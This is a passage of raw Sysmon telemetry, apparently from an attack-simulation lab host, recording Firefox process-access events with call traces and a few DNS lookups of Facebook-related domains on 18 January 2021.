Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.353{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.352{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.352{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.352{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.351{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.944{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.944{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.944{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.944{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.914{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.913{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.913{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.912{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 22542200x800000000000000017584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.140{59A5CD1D-945A-6005-3305-00000000A301}7052atlas.c10r.facebook.com02a03:2880:f01c:8004:face:b00c:0:8c;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.137{59A5CD1D-945A-6005-3305-00000000A301}7052atlas.c10r.facebook.com0157.240.20.5;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.137{59A5CD1D-945A-6005-3305-00000000A301}7052cx.atdmt.com0type: 5 atlas.c10r.facebook.com;::ffff:157.240.20.5;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.933{59A5CD1D-8E56-6005-2E00-00000000A301}246435.20.240.157.in-addr.arpa.0type: 12 edge-star-mini-shv-02-frt3.facebook.com;C:\Windows\sysmon64.exe 10341000x800000000000000017580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.214{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.214{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.213{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program 